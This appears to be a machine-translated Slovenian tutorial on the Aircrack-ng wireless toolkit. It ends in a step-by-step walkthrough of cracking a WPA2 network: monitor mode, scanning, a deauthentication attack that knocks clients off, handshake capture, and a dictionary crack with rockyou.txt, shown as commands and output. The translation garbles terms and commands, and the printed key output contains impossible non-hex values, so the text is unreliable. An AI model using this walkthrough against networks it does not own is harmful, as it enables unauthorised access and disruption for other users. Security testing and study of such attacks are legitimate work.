letalo

Kako uporabljati Aircrack-ng

Kako uporabljati Aircrack-ng
Ljudje največkrat nikoli ne pomislijo na omrežje, na katerega so povezani. Nikoli ne pomislijo, kako varno je to omrežje in koliko vsak dan tvegajo svoje zaupne podatke. Preverjanje ranljivosti lahko izvajate v omrežjih wifi z uporabo zelo zmogljivega orodja, imenovanega Aircrack-ng in Wireshark. Wireshark se uporablja za spremljanje omrežne aktivnosti. Aircrack-ng je bolj kot agresivno orodje, ki vam omogoča vdor in dostop do brezžičnih povezav. Razmišljanje kot vsiljivec je bilo vedno najvarnejši način, da se zaščitite pred vdorom. S spoznavanjem letala boste morda lahko natančno dojeli dejanja, ki jih bo vsiljivec izvedel za dostop do vašega sistema. Nato lahko na svojem sistemu opravite preverjanje skladnosti, da zagotovite, da ni varen.

Aircrack-ng je celoten nabor programske opreme, namenjene preizkušanju varnosti omrežja WiFi. Ne gre samo za eno orodje, temveč za zbirko orodij, od katerih ima vsak svoj namen. Delati je mogoče na različnih področjih varnosti wifi, na primer spremljanje dostopne točke, testiranje, napad na omrežje, razbijanje omrežja wifi in njegovo testiranje. Ključni cilj Aircracka je prestrezanje paketov in dešifriranje zgoščenk za razbijanje gesel. Podpira skoraj vse nove brezžične vmesnike. Aircrack-ng je izboljšana različica zastarele zbirke orodij Aircrack, ng se nanaša na Nova generacija. Nekaj ​​izjemnih orodij, ki sodelujejo pri reševanju večje naloge.

Airmon-ng:

Airmon-ng je vključen v komplet aircrack-ng, ki mrežno vmesniško kartico postavi v način monitorja. Omrežne kartice običajno sprejemajo samo ciljne pakete zanje, kot jih določa naslov MAC NIC-a, vendar bodo z airmon-ng sprejeti tudi vsi brezžični paketi, ne glede na to, ali so ciljno usmerjeni zanje. Ti paketi bi morali biti sposobni ujeti brez povezave ali overjanja z dostopno točko. Uporablja se za preverjanje stanja dostopne točke tako, da se omrežni vmesnik preklopi v nadzorni način. Najprej je treba konfigurirati brezžične kartice, da vklopijo način monitorja, nato pa ubiti vse procese v ozadju, če mislite, da kateri koli postopek moti to. Po zaključku postopkov lahko v brezžičnem vmesniku omogočite nadzorni način z zagonom spodnjega ukaza:

[e-pošta zaščitena]: ~ $ sudo airmon-ng start wlan0 #

Način monitorja lahko tudi onemogočite tako, da kadar koli ustavite airmon-ng, tako da uporabite spodnji ukaz:

[e-pošta zaščitena]: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng se uporablja za naštevanje vseh omrežij, ki nas obkrožajo, in za ogled dragocenih informacij o njih. Osnovna funkcionalnost airodump-ng je vohanje paketov, zato je v bistvu programiran tako, da zajema vse pakete okoli nas, medtem ko je v načinu monitor. Zagnali ga bomo proti vsem povezavam okoli nas in zbrali podatke, kot je število odjemalcev, povezanih v omrežje, ustrezne naslove mac, slog šifriranja in imena kanalov, nato pa začeli ciljati na naše ciljno omrežje.

Če vnesemo ukaz airodump-ng in mu za parameter določimo ime omrežnega vmesnika, lahko to orodje aktiviramo. Navedel bo vse dostopne točke, količino podatkovnih paketov, uporabljene metode šifriranja in preverjanja pristnosti ter ime omrežja (ESSID). Z vidika vdora so naslovi mac najpomembnejša polja.

[e-pošta zaščitena]: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack se uporablja za razbijanje gesel. Po zajemu vseh paketov z uporabo airodump lahko ključ razbijemo z letalom. Te ključe razpoči z dvema metodama PTW in FMS. Pristop PTW poteka v dveh fazah. Sprva se uporabljajo samo paketi ARP, šele nato, če ključ po iskanju ni razpokan, uporabi vse ostale zajete pakete. Dobra točka pristopa PTW je ta, da se za pokanje ne uporabljajo vsi paketi. Pri drugem pristopu, tj.e., FMS za pokanje ključa uporabljamo statistične modele in algove surove sile. Uporabimo lahko tudi slovarsko metodo.

Aireplay-ng:

Airplay-ng uvaja pakete v brezžično omrežje za ustvarjanje ali pospeševanje prometa. Pakete iz dveh različnih virov lahko zajame aireplay-ng. Prvo je omrežje v živo, drugo pa paketi iz že obstoječe datoteke pcap. Airplay-ng je uporaben med napadom za odvzem identitete, ki cilja na brezžično dostopno točko in uporabnika. Poleg tega lahko nekatere napade, kot je napitek s kavo, izvedete z airplay-ng, orodjem, ki vam omogoča, da iz odjemalčevega sistema dobite ključ.  To lahko dosežete tako, da ujamete paket ARP in nato z njim manipulirate ter ga pošljete nazaj v sistem. Nato bo odjemalec ustvaril paket, ki ga lahko zajame airodump in aircrack poči ključ iz tega spremenjenega paketa. Nekatere druge možnosti napada airplay-ng vključujejo chopchop, fragment arepreplay itd.

Airbase-ng:

Airbase-ng se uporablja za pretvorbo računalnika vsiljivca v ogroženo priključno točko, na katero se lahko drugi povežejo. Z Airbase-ng lahko trdite, da ste zakonita dostopna točka in izvajate napade človeka v sredini na računalnike, ki so priključeni na vaše omrežje. Tovrstni napadi se imenujejo Evil Twin Attacks. Osnovni uporabniki nemogoče ločiti med zakonito dostopno točko in lažno dostopno točko. Torej je zlobna dvojčka grožnja med najbolj grozečimi brezžičnimi grožnjami, s katerimi se danes srečujemo.

Airolib-ng:

Airolib pospeši proces vdora s shranjevanjem in upravljanjem seznamov gesel in dostopne točke. Sistem za upravljanje baz podatkov, ki ga uporablja ta program, je SQLite3, ki je večinoma na voljo na vseh platformah. Razbijanje gesel vključuje izračun parnega glavnega ključa, skozi katerega se pridobi zasebni prehodni ključ (PTK). Z uporabo PTK lahko določite identifikacijsko kodo okvirnega sporočila (MIC) za dani paket in teoretično ugotovite, da je MIC podoben paketu, tako da, če je bil PTK pravi, je imel prav tudi PMK.

Če si želite ogledati sezname gesel in dostopna omrežja, shranjena v zbirki podatkov, vnesite naslednji ukaz:

[e-pošta zaščitena]: ~ $ sudo airolib-ng testdatabase -stats

Tu je testdatabase db, do katerega želite dostopati ali ga ustvariti, -stats pa je operacija, ki jo želite izvesti na njem. V poljih baze podatkov lahko izvedete več operacij, na primer dajanje največje možne prednosti nekaterim SSID-jem ali kaj podobnega. Če želite uporabiti airolib-ng z aircrack-ng, vnesite naslednji ukaz:

[e-pošta zaščitena]: ~ $ sudo aircrack-ng -r testdatabase wpa2.eapol.pokrovček

Tu uporabljamo že izračunane PMK, shranjene v testdatabase za pospešitev postopka razbijanja gesel.

Razbijanje WPA / WPA2 z uporabo Aircrack-ng:

Oglejmo si majhen primer tega, kar aircrack-ng lahko stori s pomočjo nekaj svojih izjemnih orodij.  Ključ v skupni rabi omrežja WPA / WPA2 bomo razbili z uporabo slovarske metode.

Najprej moramo našteti omrežne vmesnike, ki podpirajo način nadzora. To lahko storite z naslednjim ukazom:

[e-pošta zaščitena]: ~ $ sudo airmon-ng
Nabor čipov za vmesnik PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Vidimo vmesnik; zdaj moramo najti omrežni vmesnik (wlx0) v načinu monitorja z naslednjim ukazom:

[e-pošta zaščitena]: ~ $ sudo airmon-ng start wlx0

Omogočil je način monitorja v vmesniku imenovanem wlx0mon.

Zdaj bi morali začeti poslušati oddaje bližnjih usmerjevalnikov prek našega omrežnega vmesnika, ki smo ga postavili v nadzorni način.

[e-pošta zaščitena]: ~ $ sudo airodump-ng wlx0mon
CH 5] [Preteklo: 30 s] [2020-12-02 00:17
 
BSSID PWR svetilniki # Podatki, # / s CH MB ENC CIPHER AUTH ESSID
 
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54e WPA2 CCMP PSK CrackIt
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54e. WPA2 CCMP PSK HAckme
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54e WPA2 CCMP PSK TP-Link_3802
 
Sonda BSSID STATION PWR Rate Lost Frames
 
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13 

Naše ciljno omrežje je Crackit v tem primeru, ki trenutno teče na kanalu 1.

Da bi lahko zlomili geslo ciljnega omrežja, moramo zajeti 4-smerni stisk, ki se zgodi, ko se naprava poskuša povezati z omrežjem. Zajamemo ga lahko z naslednjim ukazom:

[zaščitena po e-pošti]: ~ $ sudo airodump-ng -c 1 --bssid E4: 6F: 13: 04: CE: 31 -w / home wlx0

-c         : Kanal

-bssid: Bssid ciljnega omrežja

-w        : Ime imenika, kamor bo postavljena datoteka pcap

Zdaj moramo počakati, da se naprava poveže z omrežjem, vendar obstaja boljši način za zajemanje stiskanja rok. Naprave lahko odvzamemo pristnost z dostopno točko z napadom za odvzem pristnosti z naslednjim ukazom:

[e-pošta zaščitena]: ~ $ sudo aireplay-ng -0 -a E4: 6F: 13: 04: CE: 31

a: Bssid ciljnega omrežja

-0: Napad deuthentication

Odklopili smo vse naprave in zdaj moramo počakati, da se naprava poveže z omrežjem.

CH 1] [Preteklo: 30 s] [2020-12-02 00:02] [Rokovanje z WPA: E4: 6F: 13: 04: CE: 31
 
BSSID PWR RXQ Svetilniki # Podatki, # / s CH MB ENC CIPHER AUTH E
 
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54e WPA2 CCMP PSK P
 
Sonda BSSID STATION PWR Rate Lost Frames
 
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 CrackIt
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1            

Dobili smo zadetek in s pogledom na zgornji desni kot tik ob času lahko vidimo, da je bil ujet stisk roke. Zdaj poglejte v določeno mapo ( / domov v našem primeru) za.pcap" mapa.

Za razbijanje ključa WPA lahko uporabimo naslednji ukaz:

[e-pošta zaščitena]: ~ $ sudo aircrack-ng -a2 -w rockyou.txt -b E4: 6F: 13: 04: CE: 31 stisk roke.pokrovček
b: Bssid ciljnega omrežja
-a2: način WPA2
Rockyou.txt: Uporabljena datoteka slovarja
Rokovanje.cap: datoteka, ki vsebuje zajeto rokovanje
Aircrack-ng 1.2 beta3
[00:01:49] 10566 preizkušenih ključev (1017.96 k / s)
NAJDANI KLJUČ! [ dobil si me ]
Glavni ključ: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Prehodni ključ: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Ključ do našega ciljnega omrežja je bil uspešno zlomljen.

Zaključek:

Brezžična omrežja so povsod, uporabljajo jih vsa podjetja, od delavcev, ki uporabljajo pametne telefone, do industrijskih nadzornih naprav. Po raziskavah bo leta 2021 skoraj preko 50 odstotkov internetnega prometa prek WiFi omrežja.  Brezžična omrežja imajo številne prednosti, komunikacija zunaj vrat, hiter dostop do interneta na mestih, kjer je skoraj nemogoče položiti žice, lahko razširijo omrežje, ne da bi namestili kable za katerega koli drugega uporabnika, in brez težav povežejo vaše mobilne naprave z domačimi pisarnami, ko niste ni tam.

Kljub tem prednostim obstaja velik vprašaj glede vaše zasebnosti in varnosti. Kot ta omrežja; v oddajnem območju so usmerjevalniki odprti za vse, jih je mogoče zlahka napasti in vaše podatke zlahka ogrožati. Če ste na primer povezani z nekim javnim wifijem, lahko vsak, ki je povezan v to omrežje, z nekaj inteligence in s pomočjo izjemnih orodij, ki so na voljo, enostavno preveri vaš omrežni promet in ga celo odvrže.

Kako prikazati števec FPS v igrah Linux
Linux gaming je dobil velik zagon, ko je Valve leta 2012 napovedal podporo Linuxu za odjemalca Steam in njihove igre. Od takrat se je veliko AAA in in...
Kako prenesti in igrati Sid Meier's Civilization VI v Linuxu
Uvod v igro Civilization 6 je sodoben pogled na klasični koncept, uveden v seriji iger Age of Empires. Ideja je bila dokaj preprosta; začeli bi v zelo...
Kako namestiti in igrati Doom v Linuxu
Uvod v Doom Serija Doom je nastala v devetdesetih letih po izidu prvotnega Dooma. Bil je takojšen hit in od takrat naprej je serija iger prejela števi...